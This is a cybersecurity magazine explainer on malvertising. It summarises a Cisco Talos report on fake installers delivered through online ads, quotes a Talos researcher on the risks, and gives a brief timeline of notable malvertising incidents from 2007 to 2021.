What is Malvertising? Cyber magazine takes a look

According to Cisco Talos online advertising is increasingly being used to reach victims that are searching for software to install on their systems.

Cisco Talos Intelligence Group recently observed a malware distribution campaign that tries to trick users into executing fake software installers of popular software on their systems. It said it believes with moderate confidence that online advertising is used to reach potential victims that are searching for software to install on their systems.

Cyber magazine takes a look at malvertising. 

What is malvertising?

Malvertising, or malicious advertising, is the use of online, malicious advertisements to spread malware and compromise systems. Generally this occurs through the injection of unwanted or malicious code into ads. Malicious actors then pay legitimate online advertising networks to display the infected ads on various websites, exposing every user visiting these sites to the potential risk of infection. Generally, the legitimate advertising networks and websites are not aware they are serving malicious content.

Why does malvertising work?

Once the fake installers run, they execute three pieces of malware on the victim's system:

  • A password stealer that collects all the credentials available on the system.
  • A "backdoor" that sets up remote access via a stealth Microsoft Remote Desktop session by forwarding the RDP port through an SSH tunnel, allowing access to systems even when behind a firewall.
  • A malicious browser extension that contains several information-stealing features, such as keylogging and taking screenshots.

Cisco Talos' Technical Lead of Security Research, Tiago Pereira, says: "Password stealers have long presented a risk to individuals and to companies. The compromised accounts are frequently sold in underground forums and may lead to additional compromise using the stolen accounts and through password reuse. The chrome extension adds to this risk by allowing the theft of credentials used on the web that may not be stored in the system. Additionally, the use of an SSH tunnel to forward RDP to an external server provides attackers with a reliable way to login remotely to a system, bypassing firewall control."

Malvertising timeline

According to Wikipedia, here is a timeline of malvertising activity:

2007/2008: The first recorded sighting of malvertising was in late 2007 to early 2008. This threat was based on a vulnerability in Adobe Flash and affected a number of platforms including MySpace, Excite and Rhapsody.

2009: The online edition of The New York Times Magazine was found to be serving up an ad that was part of a larger click fraud scam that created a botnet network of malware-infected computers, nicknamed the Bahama botnet, that then went on to be used to carry out click fraud on pay per click ads all over the web. 

2010: Malvertising takes off. Marketing analysts ClickZnoted that the Online Trust Alliance (OTA) identified billions of display ads, across 3,500 sites carrying malware. In the same year the Online Trust Alliance formed a cross industry Anti-Malvertising Task Force.

2011: Spotify had a malvertising attack.

2012: Symantec includes malvertising as a section in its Internet Security Threat Report 2013.

2013: A major malvertising campaign was waged against Yahoo.com, one of the largest ad platforms with monthly visits of 6.9 billion. 

2015McAfee's Threat Report for February 2015 said that malvertising was growing quickly on mobile platforms.

2021Ransomware gang REvil was spotted using paid positioning in Google search results to deliver malicious files to victims.



Featured Articles

ICYMI: New Age of the CISO and cybersecurity trends for 2023

A week is a long time in cybersecurity, so here’s a round-up of the Cyber Magazine articles that have been starting conversations around the world

Kingfisher chooses Google Cloud as catalyst for growth

Google Cloud will support Kingfisher's digital ambitions with a range of solutions, from infrastructure to data analytics.

ICYMI: Cyber predictions for 2023 and trouble in paradise

A week is a long time in cybersecurity, so here’s a round-up of the Cyber Magazine articles that have been starting conversations around the world

Osirium shares its cyber predictions for 2023

Cyber Security

ICYMI: Unloved emails and cybersecurity worth $500bn by 2030

Cyber Security

Cyber security market anticipated to reach $500bn by 2030

Cyber Security